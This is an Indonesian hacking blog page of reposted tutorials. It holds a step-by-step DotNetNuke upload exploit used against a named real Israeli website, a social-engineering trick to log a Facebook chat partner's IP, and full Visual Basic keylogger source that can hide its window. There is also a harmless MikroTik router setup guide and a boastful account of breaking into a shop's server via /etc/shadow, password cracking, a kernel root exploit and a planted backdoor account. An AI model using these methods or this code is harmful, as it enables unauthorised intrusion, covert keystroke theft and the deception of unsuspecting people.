Sabtu, 28 Juli 2012

Hack Website Lewat HP

Mungkin kedengarannya gila bila membaca judul diatas….! ‘it’s imposible‘  kata beberapa orang, Saya hanya seorang Newbie yg selalu pgn mencoba, maaf bila postingan ini dah basi dan untuk para master jangan dibaca ya coz dah jadul.

Pada dasarnya aplikasi web browser di HP maupun di PC it cara kerjanya sama,yg membedakan adalah system yg bekerja mendukung applikasi it sendiri (Java, SymBian, Linux, Windows, Android etc). Dan ukuran atau kapasitas serta kemampuan menampilkan web. Tapi pada dasarnya cara kerjanya tetap. Sama, jadi apa yg bisa dilakukan lwt pc,kmgknan bsa jg dikerjakan lwt hape…!
Nah yg coba saya bahas disini adalah exploit web dgn cara hack web melalui DNN (dot net nuke) exploit
melalui hape.
Bahan2 yg kita butuhkan adalah:

1. Operamini browser versi 5.0
2. Operamini browser versi 4.2
Kenapa pake 2 Web Browser ?
Lebih enak pake 2 browser di atas.alasannya adalah:
1. Operamini 5.0 mendukung multi tab jadi cocok buat mencari target dan mengetesnya   tanpa harus open close satu2.
2. Operamini 5.0 mempunyai kemampuan copi paste,pilih text dan lgsg mensearchnya dlm sekali klik ditab yg sama ataupun membukanya di tab baru.
3. Operamini 4.2 respon browser lbh bagus dr yg v 5.0
Setelah cek target dr opmin 5.0 dan ternyata vuln tgl copy kan aja linknya di operamini 4.2 .
Tgl kta exploit lwt situ..
(Operamini 4.2 tdk multi tab,untuk yg multi tab slhkan cari di opera modif di google)
Nah sekarang memasuki langkah2 atau cara2 melakukan hack web dgn DNN exploit melalui opera mini.
Pertama: pastikan anda masih mempunyai saldo pulsa
Kedua: buka operamini v 5.0 anda dan ketik di kolom google search dorknya->
inurl:”/portals/0″  
And search!!…
Nah dapet kan??
Tinggal kita pilh target yang pas di hati.dan kali ini saya coba di situs orang israel.
Taruh cursor di link target trus tekan angka 1 di keypad hape anda.
Pilih open in new tab.
Begitu seterusnya untuk link target yg lain sampai keluar beberapa tab.
Oh,ya untuk mengetahu gimana ,apa dan bagaimana DNN exploit it silahkan baca disini:
http://securityreason.com/exploitalert/6234
Next, misalkan kita dah dpt targetnya nih…
Example site:
http://fril.co.il/portals/0/cwindex.txt
Spti keterangan di securityreason di atas kita coba potong link target dan menggantinya dgn
/Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx  
->http://site.com/[path]/portals/0/a.txt
Menjadi
->http://site.com/[path]/Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx  
Lakukan it pada smua target yg udah kamu buka pada browser operamini 5.0 km.biar gak bolak balik
copas lagi.
Setelah dapet dan pasti vuln seperti site di bawah ini.
http://fril.co.il//Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Copy dan pastekan di opera 4.2 kamu.
Nb:Alasannya knapa pindah browser yaitu pada opera 5.0 di hape saya kurang respon pada perintahupload. Proses upload berjalan tapi file tidak terupload dan begitu di coba di v 4.2 sukses terupload. Tapi bila di v.5.0 km bisa ya lanjut aja disitu.gak ush pndah applikasi.
Lanjut proses.!
Setelah site target di buka di opmin 4.2
Pilih : file ( select a file on your site)
Tunggu biar loading selesai dan menampilkan 2 kolom:
Kolom 1 biasanya tulisan ‘root’
Kolom 2 berisi macam2 file.
Setelah loading selesai hapus link di addres bar operamini kamu dan ganti dgn script di bawah ini:
javascript:__doPostBack(‘ctlURL $cmdUpload’,”)
Lalu klik ok….
Kolom yg tdnya berisi ‘root’ dan ‘jenis2 file’
Skrg ganti menjadi kolom ‘root’ dan kolom kosong untuk upload file.
Nah skrg tgl km upload tuh file txt yg udah km simpan di hape km.
SUCCESS..! you cAn hacked a web site from mobile phone.
Hasilnya seperti ini http://fril.co.il/portals/0/xadal.txt < 100% lewat handphone
Nb: angka 1 di operamini berfungsi untuk copas,select text and open new tab.
-sekian-


Sumber : www.binushacker.net

Cara Mengetahui IP Lawan via Chatting Facebook

Tutorial ini digunakan untuk mengetahui IP lawan dengan cara chat di FaceBook.
Hal ini bermanfaat untuk mengidentifikasi lawan melalui media Social Engineering.
Cara Mengetahui IP Lawan
Ada beberapa yang perlu disiapkan yaitu:
  1. Sebuah SERVER HOSTING yang bisa dipakai untuk menyimpan file logger.
  2. Sebuah LINK content / halaman menarik yang dapat digunakan untuk mengalihkan perhatian lawan.
  3. FILE LOGGER itu sendiri.
Instalasi FILE LOGGER kedalam CONTENT:

  1. Bikin sebuah artikel yang indah & menarik, sehingga akan banyak orang yang akan melihat.
  2. Kemudian buatlah file HTML, misalkan simpan difile: “galau.html“.
  3. Pada sela-sela code html tersebut, masukkanlah / inject code logger kedalam source htmlnya.
  4. Sesuaikan / edit alamat email untuk pengiriman hasil IP target di dalam code loggernya.
  5.  Kemudian upload file tersebut ke server hosting.
  6. Pastikan serverhosting memiliki kemampuan  pengiriman email seperti: SMTP / POP3
  7. Nanti file tersebut dibuka dengan: http://www.situsanda.com/galau.html
Cara yang dipakai disini adalah:
  1. Berusaha chatting dengan lembut dan baik dengan lawan chatting kita.
  2. Kemudian rayulah lawan untuk dapat meng-klik LINK yang sudah kita berikan tadi.
  3. Konfirmasikan ke lawan apakah sudah membaca link dengan cara menanyakan apa isi linknya.
  4. Link yang anda kirimkan adalah link logger yang tadi yaitu http://www.situsanda.com/galau.html
Setelah dapat dipastikan bahwa lawan kita sudah melihat link tersebut.
Maka, jreeengggggg.. kita lihat hasilnya. Itulah dia IP lawan chatting kita di Facebook.
Untul lebih jelas detailnya silakan ditonton disini:
File yang dibutuhkan, silakan download disini:

Selamat mencoba & semoga berhasil :)

Sumber : www.binushacker.net

Cara membuat key logger dengan Visual Basic

Sesuai dengan judul di atas, kali ini saya akan memberikan sedikit tutorial cara membuat key logger sederhana dengan Visual Basic. Oke langsung saja gan..
  1. Siapkan Visual Basic , Disini saya menggunakan Visual Basic 6.0
  2. Buka program Visual Basic
  3. New Project Standard EXE

  4. Tambahkan 1 buah TextBox, 4 buah CommandButton, 2 Timer, dan 6 buah Label (Lihat Gambar)
  5. Copas seluruh Code di bawah ini :
    Private Declare Function GetAsyncKeyState Lib “user32″ (ByVal vKey As Long) As Integer
    Private Declare Function GetForegroundWindow Lib “user32″ () As Long
    Private Declare Function GetWindowText Lib “user32″ Alias “GetWindowTextA” (ByVal hWnd As Long, ByVal sWndTitle As String, ByVal cLen As Long) As Long
    Private hForegroundWnd As Long
    Private backs As BooleanPrivate Sub Command1_Click()
    Timer1.Enabled = True
    End SubPrivate Sub Command2_Click()
    Timer1.Enabled = False
    End SubPrivate Sub Command3_Click()
    backs = True
    End SubPrivate Sub Command4_Click()
    backs = False
    End SubPrivate Sub Form_Load()
    backs = True
    End SubPrivate Sub Label1_Click()
    End Sub
    Private Sub Label4_Click()
    End Sub
    Private Sub Label6_Click()
    Timer1.Enabled = True
    End Sub
    Private Sub Label7_Click()
    Timer1.Enabled = False
    End Sub
    Private Sub Label8_Click()
    backs = True
    End Sub
    Private Sub Label9_Click()
    backs = False
    End Sub
    Private Sub Text1_Change()
    Text1.SelStart = 0
    Text1.SelLength = Len(Text1.Text)
    End Sub
    Private Sub Timer1_Timer()
    Dim x, x2, i, t As Integer
    Dim win As Long
    Dim Title As String * 1000
    win = GetForegroundWindow()
    If (win = hForegroundWnd) Then
    GoTo Keylogger
    Else
    hForegroundWnd = GetForegroundWindow()
    Title = “”
    GetWindowText hForegroundWnd, Title, 1000
    Select Case Asc(Title)
    Case 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95
    Text1.Text = Text1.Text & vbCrLf & vbCrLf & “[ " & Title
    Text1.Text = Text1.Text & " ]” & vbCrLf
    End Select
    End If
    Exit Sub
    Keylogger:
    For i = 65 To 90
    x = GetAsyncKeyState(i)
    x2 = GetAsyncKeyState(16)
    If x = -32767 Then
    If x2 = -32768 Then
    Text1.Text = Text1.Text & Chr(i)
    Else: Text1.Text = Text1.Text & Chr(i + 32)
    End If
    End If
    Next
    For i = 8 To 222
    If i = 65 Then i = 91
    x = GetAsyncKeyState(i)
    x2 = GetAsyncKeyState(16)
    If x = -32767 Then
    Select Case i
    Case 48
    Text1.Text = Text1.Text & IIf(x2 = -32768, “)”, “0″)
    Case 49
    Text1.Text = Text1.Text & IIf(x2 = -32768, “!”, “1″)
    Case 50
    Text1.Text = Text1.Text & IIf(x2 = -32768, “@”, “2″)
    Case 51
    Text1.Text = Text1.Text & IIf(x2 = -32768, “#”, “3″)
    Case 52
    Text1.Text = Text1.Text & IIf(x2 = -32768, “$”, “4″)
    Case 53
    Text1.Text = Text1.Text & IIf(x2 = -32768, “%”, “5″)
    Case 54
    Text1.Text = Text1.Text & IIf(x2 = -32768, “^”, “6″)
    Case 55
    Text1.Text = Text1.Text & IIf(x2 = -32768, “&”, “7″)
    Case 56
    Text1.Text = Text1.Text & IIf(x2 = -32768, “*”, “8″)
    Case 57
    Text1.Text = Text1.Text & IIf(x2 = -32768, “(“, “9″)
    Case 112: Text1.Text = Text1.Text & ” F1 “
    Case 113: Text1.Text = Text1.Text & ” F2 “
    Case 114: Text1.Text = Text1.Text & ” F3 “
    Case 115: Text1.Text = Text1.Text & ” F4 “
    Case 116: Text1.Text = Text1.Text & ” F5 “
    Case 117: Text1.Text = Text1.Text & ” F6 “
    Case 118: Text1.Text = Text1.Text & ” F7 “
    Case 119: Text1.Text = Text1.Text & ” F8 “
    Case 120: Text1.Text = Text1.Text & ” F9 “
    Case 121: Text1.Text = Text1.Text & ” F10 “
    Case 122: Text1.Text = Text1.Text & ” F11 “
    Case 123: Text1.Text = Text1.Text & ” F12 “
    Case 220: Text1.Text = Text1.Text & IIf(x2 = -32768, “|”, “\”)
    Case 188: Text1.Text = Text1.Text & IIf(x2 = -32768, “<”, “,”)
    Case 189: Text1.Text = Text1.Text & IIf(x2 = -32768, “_”, “-”)
    Case 190: Text1.Text = Text1.Text & IIf(x2 = -32768, “>”, “.”)
    Case 191: Text1.Text = Text1.Text & IIf(x2 = -32768, “?”, “/”)
    Case 187: Text1.Text = Text1.Text & IIf(x2 = -32768, “+”, “=”)
    Case 186: Text1.Text = Text1.Text & IIf(x2 = -32768, “:”, “;”)
    Case 222: Text1.Text = Text1.Text & IIf(x2 = -32768, Chr(34), “‘”)
    Case 219: Text1.Text = Text1.Text & IIf(x2 = -32768, “{“, “[")
    Case 221: Text1.Text = Text1.Text & IIf(x2 = -32768, "}", "]“)
    Case 192: Text1.Text = Text1.Text & IIf(x2 = -32768, “~”, “`”)
    Case 8: If backs = True Then If Len(Text1.Text) > 0 Then Text1.Text = Mid(Text1.Text, 1, Len(Text1.Text) – 1)
    Case 9: Text1.Text = Text1.Text & ” [ Tab ] “
    Case 13: Text1.Text = Text1.Text & vbCrLf
    Case 17: Text1.Text = Text1.Text & ” [ Ctrl ]“
    Case 18: Text1.Text = Text1.Text & ” [ Alt ] “
    Case 19: Text1.Text = Text1.Text & ” [ Pause ] “
    Case 20: Text1.Text = Text1.Text & ” [ Capslock ] “
    Case 27: Text1.Text = Text1.Text & ” [ Esc ] “
    Case 32: Text1.Text = Text1.Text & ” “
    Case 33: Text1.Text = Text1.Text & ” [ PageUp ] “
    Case 34: Text1.Text = Text1.Text & ” [ PageDown ] “
    Case 35: Text1.Text = Text1.Text & ” [ End ] “
    Case 36: Text1.Text = Text1.Text & ” [ Home ] “
    Case 37: Text1.Text = Text1.Text & ” [ Left ] “
    Case 38: Text1.Text = Text1.Text & ” [ Up ] “
    Case 39: Text1.Text = Text1.Text & ” [ Right ] “
    Case 40: Text1.Text = Text1.Text & ” [ Down ] “
    Case 41: Text1.Text = Text1.Text & ” [ Select ] “
    Case 44: Text1.Text = Text1.Text & ” [ PrintScreen ] “
    Case 45: Text1.Text = Text1.Text & ” [ Insert ] “
    Case 46: Text1.Text = Text1.Text & ” [ Del ] “
    Case 47: Text1.Text = Text1.Text & ” [ Help ] “
    Case 91, 92: Text1.Text = Text1.Text & ” [ Windows ] “
    End Select
    End If
    Next
    End Sub
    Private Sub Timer2_Timer()
    Dim a, b, x As Long
    a = GetAsyncKeyState(120)
    b = GetAsyncKeyState(121)
    x = GetAsyncKeyState(16)
    If a = -32767 And x = -32768 Then Me.Hide
    If b = -32767 And x = -32768 Then Me.Show
    End Sub
  6. Jalankan dengan menekan tombol F5
  7. Live demo bisa di download disini :
Selamat mencoba, semoga bermanfaat tutorial sederhana membuat keylogger ini. Wassalam…

Sumber : www.binushacker.net

setting microtik dengan modem tplink speedy

kemaren dapet projekan di warnet lufi ( tanjung priuk ). Kasusnya sih gara2 warnet ini kena hack hehehehe….dan sering di down dengan udp flood attack yang sekira-kiranya memang bikin down koneksi speedy yang menggunakan modem adsl .. ok langsung aja deh ..

yang di perlukan
- cd mikrotik linux iso ( lom gw upload ) nanti ya gw upload pasti jadi
- komputer ( pc ) minimal pentium 3
- 2 buah lan card ( yang pertama untuk ke modem yang atunya lagi untuk ke LAN )
- switch hub
- modem tplink apa aja
- koneksi speedy
Memulai instalasi :
pada kasus ini kita akan menjadikan modem menjadi bridge dan bukan sebagai pppoe. di sini ane gk akan jelaskan lagi mengenai bridge atau pppoe silahkan browse di google untuk mencari keterangan lebih lanjut.
perhatikan topologi berikut ini …
modem —- router mikrotik —- switch —- client
ok kita mulai dengan setting modem terlebih dahulu setiap modem speedy rata-rata default ip 192.168.1.1
tersrah klo ente mau robah ip Local modem. panggil terus setting di browser ente
setting type service ente menjadi bridge dan isikan

virtual circuit=pcvo, VPI:0 ,VCI:35 ,Service Category:UBR without PCR, encapsulation:1483 bridge IP LLC
perhatikan nomer vpi dan vci harus di sesuaikan dengan lokasi anda. Jika anda tidak tau silahkan hubungi 147 untuk informasi ini.
A. Jakarta
1. Untuk Modem ADSL buatan Alcatel-Lucent (France)
Encapsulation = PPPoA • VPI = 8 • VCI = 35
2. Untuk Modem ADSL buatan Huawei Technologies Co Ltd (China)
Encapsulation = PPPoE • VPI = 0 • VCI = 35 (lama)
Encapsulation = PPPoE • VPI = 8 • VCI = 81 (updatedthanks to s4nji)
3. Untuk Modem ADSL buatan Siemens AktienGesellschaft (Germany)
Encapsulation = PPPoA • VPI = 1 • VCI = 33
B. Sumatra, Jawa Barat, Jawa Tengah, Jawa Timur, Bali, Kalimantan, Sulawesi
1. Untuk DSLAM buatan ZTE (ZhongXing Telecommunication Equipment Co Ltd)(China)
Encapsulation = PPPoE • VPI = 8 • VCI = 81
2. Untuk DSLAM buatan Huawei Technologies Co Ltd (China)
Encapsulation = PPPoE • VPI = 0 • VCI = 35
3. Untuk DSLAM buatan ArticoNet
Encapsulation = PPPoE • VPI = 0 • VCI = 35
4. Untuk Modem ADSL buatan TP-Link (yang paling sering digunakan adalah tipe TD-8817)
Encapsulation = PPPoE LLc • VPI = 0 • VCI = 35
CATATAN
  • VPI : Virtual Path Identifier merujuk pada sebuah bidang 8-bit (paket data user ke jaringan) atau 12-bit (paket antar jaringan) dalam header dari sebuah paket Mode Transfer Asynchronous (MTA). VPI, bersama-sama dengan VCI (Virtual Channel Identifier) digunakan untuk mengidentifikasi tujuan sel berikutnya saat melewati serangkaian switch MTA dalam perjalanannya. VPI berguna untuk mengurangi tabel switch dari beberapa Sirkuit Virtual yang memiliki jalur tertentu.
  • VCI: Virtual channel identifier adalah sebuah identifikasi unik yang menunjukkan sirkuit virtual tertentu di dalam sebuah jaringan. VCI adalah bidang 16-bit dalam header sel Mode Transfer Asynchronous. VCI, bersama-sama dengan VPI (Virtual Path Identifier) digunakan untuk mengidentifikasi tujuan sel berikutnya saat melewati serangkaian switch MTA.
bagi beberapa jenis modem kita tinggal memakai fasilitas quick setup
Sekarang saatnya instal mikrotik anda
langkah – langkah setting mikrotiknya :
1. plug kedua lan card tadi di motherboard
2. boot pc koe terus masukin cd mikrotik iso ( first boot jgn lupa di setting cd room )
3. pada saat booting centang pilihan-pilihan yang akan ente sertakan dalam fitur2 mikrotik
tampilan awal setelah boot
4. ikutin aja prosesnya ntar tinggal reboot kok

5. Login
Pas di minta login ente tinggal login aja dengan user : admin , password di kosongkan aja gk usah di isi soalnya lom di setup . nah terus ente enter deh

6. wellc0me to mikrotik hehehe ( installation mikrotik on pc is done )

7. Langkah install udah kelar deh sekarang kita setting ok … go go go
8. Demi keamanan ganti pass dolo dah …
[admin@mikrotik]>password
old password : ( teken enter aja gan soalnya lom ada password )
new password : *******
retype new password : *******


9. ganti nama mikrotik router

[admin@mikrotik]>system identity set name=”nama mikrotik yang ente mau”
10. melihat interface pada mikrotik

Untuk mengecek apakah ke dua lan card tadi telah terinstal di mikrotik dan berhasi di baca ama mikrotik lakukan perintah
[admin@mikrotik] > interface print
Flags: X – disabled, D – dynamic, R – running
# NAME TYPE RX-RATE TX-RATE MTU
0 R ether1 ether 0 0 1500
1 R ether2 ether 0 0 1500
11. kasi nama masing ether yang ada biar gk binggung eheheh
[admin@mikrotik]>interface ethernet set ether1 name=speedy
[admin@mikrotik]>interface ethernet set ether2 name=lokal
abis itu cek klo udah bener
[admin@mikrotik]ip address print
12. Memberikan Ip address pada masing-masing ether

semisal ente kepingin ether1 untuk di gunakan ke pppoe (Point-to-Point Protocol over Ethernet/Point-to-Point Protocol over ATM ) pengganti modem nantinya dan ether2 untuk LAN nya masukin perintah di bawah ini :
[admin@mikrotik] > ip address add address=192.168.0.103/24
netmask=255.255.255.0 interface=ether1
[admin@mikrotik] > ip address add address=172.16.0.1/24
netmask=255.255.255.0 interface=ether2
13. cek jika sudah berhasil memberikan ip address di masing2 ether
[admin@mikrotik] >ip address print
Flags: X – disabled, I – invalid, D – dynamic
# ADDRESS NETWORK BROADCAST INTERFACE
0 192.168.0.1/24 192.168.0.0 192.168.0.63 ether1
1 172.16.0.1/24 172.16.0.0 172.16.0.255 ether2
cek ping deh klo dah reply dah seep berarti :P
14. Kemuidan, aktifkan fitur PPPOE di Mikrotik supaya mikrotik melakukan dial ke modem ADSL Speedy.
[admin@mikrotik]>interface pppoe-client add name=pppoe-client-speedy user=142xxxxxxxxx@telkom.net
password=XXXXXXXXXX interface=speedy service-name=internet disabled=no
15. Tambain gatewaynya
[admin@mikrotik]>ip route add gateway= 125.12423.1.1
gateway di dapet pada keterangan modem anda kira-kira ada di bagian informasi kok :P
Periksa apa setingan ente dah yahood ap lom .. :D
[admin@mikrotik]>ip route print
16. Setting DNS Speedy
[admin@mikrotik]>ip dns set primary-dns=202.134.1.10 allow-remote-request=yes
[admin@mikrotik]>ip dns set secondary-dns=202.134.0.155 allow-remote-request=yes
17. Setting masquerade

setting masquerade ini sebenarnya bertujuan untuk meneruskan perintah dari routing dari semua client ke NAT firewall mikrotik.
[admin@mikrotik]>ip firewall nat add chain=srcnat action=masquerade
Langkah akhir, buka winbox pada browser ip address nya yang ente pasang pada ether1, pada menu pppoe yang barusan yang ente buat, masuk ke menu PPP > Interfaces > dobel klik koneksi ente terus pilih Tab Dial Out, centang “add default route”.

ping ke 202.134.0.10. klo udah ngereply, ente dah sukses .. heheheh
18. setting DHCP tinggal login di winbox terus setting deh jgn lupa pilih ether yang sudah ente setting tadi sebagai LAN terus tentukan secara manual DHCP nya di mulai dari ip range, gateway , dll
19. Pada setiap client disetting dengan range IP yang udah kita set sebelumnya
moga berguna yak ,… nanti ane share lagi klo ada tehnik2 lanjutannya ..

Beginilah kalau lalai dalam permission file /etc/shadow

Sesuatu banget ya hanya karena lalai mengembalikan posisi permission file /etc/shadow dan /etc/passwd ternyata bisa berpengaruh buruk … pengalaman yang ane dapatkan ini semoga jadi pelajaran bagi para teman-teman yang berprofesi sysadmin. Tadi pagi iseng nyari toko-toko komputer luar negeri kebetulan mau perbandingan harga.. eh malah nemu bug di salah satu site yang ane dapat dari google. Muncul dah sifat iseng , cuma pengen ngetes saja sih. Eh gk atau nya masuk sampe nanem backdoor  terus backconnect …

Perhatikan gambar di atas.. ane bisa masuk dan melihat melihat file pada /etc/shadow.. karena memang walaupun id dan group adalah www-data cuma www-data ini juga memiliki group aditional yang diijinkan untuk “read” file keramat tersebut.

Akhirnya sya copas isi file /etc/shadow kemudian saya buka backtrack …dan memainkan john the ripper, salah satu tools cracking bawaan dari os ini.
Dengan menggunakan unshadow .. tidak menunggu waktu yang lama .. john berhasil melakukan cracking pada satu account non privilage dari 3 user yang memiliki akses /bin/bash ….

Tidak menunggu lama ane langsung connect ke ssh dengan user tersebut.. beruntung port masih standart.. jadi gk perlu tes satu persatu port dengan hping.
Begitu bisa masuk melalui ssh .,. ane langung buat file exploit.c sesuai kernel terus ane kompilasi dan esekusi ..alhasil ane mendapatkan akses root :p

Setelah dapat akses root sementara akibat dari exploit tadi , ane buat user dengan privilege root yang sesuai dengan group allowed di /etc/sudoers .. ane bikin user buat kapan-kapan bisa dateng lagi heheheh. Setelah membuat user dengan privilege root ( sudoers ) ane login kembali di ssh dengan user baru .. dan perintah sakti “sudo su” ternyata berhasil :P

Intinya .. jgn sampai pernah memastikan bahwa file /etc/shadow anda tetep dalam posisi permission yang default.. ok deh sampai disini saya, zee eichel ijin undur dari hadapan anda ..viva la backtrack